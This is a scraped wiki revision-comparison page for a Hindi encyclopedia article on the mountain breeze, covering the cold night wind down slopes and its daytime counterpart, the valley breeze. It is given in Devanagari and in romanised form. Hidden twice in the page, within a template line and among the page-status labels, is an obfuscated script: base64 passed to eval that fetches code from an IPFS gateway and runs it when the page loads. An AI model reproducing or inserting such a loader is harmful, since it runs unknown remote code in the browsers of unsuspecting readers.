Difference between revisions of "पर्वत समीर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
'''पर्वत समीर''' एक प्रकार की पवन को कहा जाता है।
+
'''पर्वत समीर''' ([[अंग्रेज़ी]]: Mountain breeze) अर्थात पर्वत की चोटियों से घाटियों की ओर बहने वाली ठंडी, भारी पवन।
  
*अधिकांश पर्वतीय क्षेत्रों में दो प्रकार की दैनिक पवनें चलती हैं। दिन के समय पर्वतीय ढाल वाला क्षेत्र उसकी घाटियों की अपेक्षा अधिक गर्म हो जाता है, जिसके कारण पवन का संचरण घाटी से ऊपर की ओर होने लगता है। इसी को '[[घाटी समीर]]' कहा जाता है।
+
*[[पर्वत]] के ऊँचे क्षेत्र रात के समय, विशेष रूप से जब आकाश स्वच्छ होता है, [[ऊष्मा]] विकिरित करके, अपेक्षाकृत अधिक ठंडे हो जाते हैं। इससे उनके ऊपर की वायु भी ठंडी हो जाती है और वह घाटियों की ओर बहने लगती है। इसी को 'पर्वत समीर' कहते हैं।
 
+
*इसके विपरीत दिन के समय धूप निकलने पर पर्वतीय ढाल वाला क्षेत्र उसकी घाटियों की अपेक्षा अधिक गर्म हो जाता है, जिसके कारण पवन का संचरण घाटी से ऊपर की ओर होने लगता है। इसे '[[घाटी समीर]]' कहा जाता है।
*इसके विपरीत सूर्यास्त के बाद रात्रि के समय यह व्यवस्था पलट जाती है। पर्वतीय ढालों पर पार्थिव विकीरण द्वारा तेजी से [[ऊष्मा]] का विसर्जन हो जाने से वहाँ उच्च [[वायुदाब]] का क्षेत्र बन जाता है तथा ऊँचाई वाले भागों से ठंडी एवं घनी हवा नीचे बैठने लगती है, इस पवन को 'पर्वत समीर' कहते है।
 
  
  

Revision as of 14:03, 2 April 2014

parvat samir (aangrezi: Mountain breeze) arthat parvat ki chotiyoan se ghatiyoan ki or bahane vali thandi, bhari pavan.

  • parvat ke ooanche kshetr rat ke samay, vishesh roop se jab akash svachchh hota hai, ooshma vikirit karake, apekshakrit adhik thande ho jate haian. isase unake oopar ki vayu bhi thandi ho jati hai aur vah ghatiyoan ki or bahane lagati hai. isi ko 'parvat samir' kahate haian.
  • isake viparit din ke samay dhoop nikalane par parvatiy dhal vala kshetr usaki ghatiyoan ki apeksha adhik garm ho jata hai, jisake karan pavan ka sancharan ghati se oopar ki or hone lagata hai. ise 'ghati samir' kaha jata hai.


  1. REDIRECTsaancha:inhean bhi dekhean<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh